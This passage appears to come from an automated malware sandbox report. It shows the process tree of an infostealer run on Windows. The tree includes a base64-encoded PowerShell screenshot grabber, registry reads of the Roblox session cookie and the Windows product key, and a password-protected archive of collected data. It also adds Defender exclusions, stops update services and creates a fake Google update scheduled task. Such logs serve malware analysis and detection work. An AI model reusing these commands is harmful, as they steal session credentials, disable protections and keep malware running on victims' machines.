JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                              8⤵
                                                                                                                                                PID:4800
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                  9⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:5448
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mem54c3g\mem54c3g.cmdline"
                                                                                                                                                    10⤵
                                                                                                                                                      PID:3472
                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES196F.tmp" "c:\Users\Admin\AppData\Local\Temp\mem54c3g\CSC3EBE0098AA8E4AFDB3B7870C0AB9921.TMP"
                                                                                                                                                        11⤵
                                                                                                                                                          PID:4448
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                    8⤵
                                                                                                                                                      PID:5784
                                                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                                                        tree /A /F
                                                                                                                                                        9⤵
                                                                                                                                                          PID:6012
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                        8⤵
                                                                                                                                                          PID:6052
                                                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                                                            tree /A /F
                                                                                                                                                            9⤵
                                                                                                                                                              PID:6120
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                            8⤵
                                                                                                                                                              PID:3180
                                                                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                                                                tree /A /F
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:1840
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:1836
                                                                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                                                                    tree /A /F
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:2584
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:4796
                                                                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                                                                        tree /A /F
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:3040
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:6288
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:6352
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:6744
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                              9⤵
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              PID:6816
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:7092
                                                                                                                                                                              • C:\Windows\system32\getmac.exe
                                                                                                                                                                                getmac
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:7204
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI13042\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\sLtWI.zip" *"
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:7732
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI13042\rar.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\_MEI13042\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\sLtWI.zip" *
                                                                                                                                                                                    9⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:7660
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:7540
                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                      wmic os get Caption
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:7476
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:7420
                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                        wmic computersystem get totalphysicalmemory
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:7368
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:7324
                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                            wmic csproduct get uuid
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:7264
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:5652
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                PID:7908
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:8040
                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                  wmic path win32_VideoController get name
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                  • Detects videocard installed
                                                                                                                                                                                                  PID:8764
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:8700
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                      PID:8636
                                                                                                                                                                                      • C:\Users\Admin\Desktop\jet\jet.exe
                                                                                                                                                                                        "C:\Users\Admin\Desktop\jet\jet.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:8916
                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:8924
                                                                                                                                                                                            • C:\Users\Admin\Desktop\jet\jet.exe
                                                                                                                                                                                              "C:\Users\Admin\Desktop\jet\jet.exe"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:9308
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:9384
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                PID:10128
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:5752
                                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                                    sc stop UsoSvc
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:5480
                                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                                    sc stop WaaSMedicSvc
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:5492
                                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                                    sc stop wuauserv
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:4608
                                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                                    sc stop bits
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:2004
                                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                                    sc stop dosvc
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:5224
                                                                                                                                                                                                • C:\Windows\System32\dialer.exe
                                                                                                                                                                                                  C:\Windows\System32\dialer.exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:5960
                                                                                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                    C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:5940
                                                                                                                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                      C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                      PID:5816
                                                                                                                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                      C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:6072
                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:3584
                                                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:3764
                                                                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:3968
                                                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:3852
                                                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:3176
                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:3964
                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2936
                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:1872
                                                                                                                                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:3952
                                                                                                                                                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2268
                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:1496
                                                                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:3732
                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:3816
                                                                                                                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:1944
                                                                                                                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:3456
                                                                                                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:1976
                                                                                                                                                                                                                                    • C:\Windows\System32\rundll32.exe
